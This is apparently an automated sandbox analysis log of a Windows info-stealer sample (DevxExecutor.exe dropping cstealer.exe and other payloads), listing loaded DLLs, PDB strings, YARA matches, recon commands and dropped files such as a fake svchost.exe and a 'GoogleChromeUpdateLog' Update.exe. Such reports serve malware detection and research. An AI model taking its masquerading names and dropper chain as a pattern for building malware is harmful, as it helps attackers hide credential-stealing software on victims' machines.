                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: python3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libffi-8.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DevxExecutor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\DevxExecutor.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: DevxExecutor.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DevxExecutor.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: DevxExecutor.exe | Static file information: File size 46285824 > 1048576
Source: DevxExecutor.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c23a00
Source: DevxExecutor.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN | source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb | source: cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2193894661.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2549694907.00007FF8B8833000.00000002.00000001.01000000.00000028.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb | source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb | source: cstealer.exe, 00000009.00000002.2556408561.00007FF8B90E0000.00000002.00000001.01000000.0000001E.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb | source: cstealer.exe, 00000009.00000002.2532242365.00007FF8B7E3E000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb | source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb | source: cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187624587.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2551384631.00007FF8B90AD000.00000002.00000001.01000000.00000020.sdmp, cstealer.exe, 00000049.00000003.2467259696.000001DB63733000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ | source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb | source: cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188566786.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb | source: cstealer.exe, 00000002.00000003.2160955520.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2186856638.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187476154.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp, cstealer.exe, 00000009.00000002.2558162642.00007FF8B9101000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb | source: cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188481865.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2548484415.00007FF8B8793000.00000002.00000001.01000000.0000002D.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb | source: cstealer.exe, 00000009.00000002.2540558545.00007FF8B80ED000.00000002.00000001.01000000.00000029.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb | source: cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2194731679.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2454876358.00007FF8A8020000.00000002.00000001.01000000.00000030.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb | source: cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188096980.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2536033958.00007FF8B8017000.00000002.00000001.01000000.0000002C.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb | source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python311.pdb | source: main.exe, 00000008.00000002.2222098181.00007FF8A8CCB000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2497830571.00007FF8A86FB000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb | source: cstealer.exe, 00000009.00000002.2476831702.00007FF8A8300000.00000002.00000001.01000000.0000002B.sdmp

Data Obfuscation

Source: Yara match | File source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002E.00000002.2512314562.0000016135011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: VCRUNTIME140.dll.2.dr | Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 8_2_00007FF8A8F28610 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 8_2_00007FF8A8F28610
Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | File created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_7312906
Source: main.exe.0.dr | Static PE information: section name: _RDATA
Source: cstealer.exe.0.dr | Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.2.dr | Static PE information: section name: .00cfg
Source: libssl-1_1.dll.2.dr | Static PE information: section name: .00cfg
Source: python311.dll.2.dr | Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.2.dr | Static PE information: section name: _RDATA
Source: Build.exe.4.dr | Static PE information: section name: .didat
Source: VCRUNTIME140.dll.4.dr | Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.7.dr | Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.7.dr | Static PE information: section name: .00cfg
Source: libssl-1_1.dll.7.dr | Static PE information: section name: .00cfg
Source: python311.dll.7.dr | Static PE information: section name: PyRuntim
Source: C:\Users\user\Desktop\DevxExecutor.exe | Code function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC65ACDD push rcx; retf 003Fh 3_2_00000271DC65ACDE
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC68C6DD push rcx; retf 003Fh 3_2_00000271DC68C6DE
Source: C:\Windows\System32\cmd.exe | Code function: 5_2_00000230D90FACDD push rcx; retf 003Fh 5_2_00000230D90FACDE
Source: C:\Windows\System32\cmd.exe | Code function: 5_2_00000230D922C6DD push rcx; retf 003Fh 5_2_00000230D922C6DE
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E7126ACDD push rcx; retf 003Fh 7_2_0000014E7126ACDE
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E7129C6DD push rcx; retf 003Fh 7_2_0000014E7129C6DE
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | File created: C:\ProgramData\svchost.exe
Source: C:\Users\user\AppData\Local\Temp\main.exe | Process created: "C:\Users\user\AppData\Local\Temp\main.exe"
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dll
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\_lzma.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\python311.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_pytransform.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_socket.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\nacl\_sodium.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | File created: C:\ProgramData\Microsoft\based.exe
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\Users\user\Desktop\DevxExecutor.exe | File created: C:\Users\user\AppData\Local\Temp\cstealer.exe
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\_decimal.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\python310.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\python311.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\libssl-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\libffi-8.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\sqlite3.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\unicodedata.pyd
Source: C:\ProgramData\main.exe | File created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_ssl.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\python310.dll
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\_sqlite3.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\python311.dll
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\select.pyd
Source: C:\ProgramData\main.exe | File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\libssl-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\select.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\VCRUNTIME140.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_lzma.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_cffi_backend.cp310-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\libssl-1_1.dll
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\_hashlib.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-heap-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\_decimal.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\_socket.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\_ssl.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_ssl.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\libssl-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI77882\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\sqlite3.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\python3.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI53642\_ssl.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\ProgramData\Microsoft\hacn.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI47682\_bz2.pyd
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\libffi-8.dll
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI14722\rar.exe
Source: C:\Users\user\Desktop\DevxExecutor.exe | File created: C:\Users\user\AppData\Local\Temp\main.exe
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\_queue.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-handle-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\wrapt\_wrappers.cp310-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\select.pyd
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\bcrypt\_bcrypt.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI86682\libffi-8.dll
Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-namedpipe-l1-1-0.dll
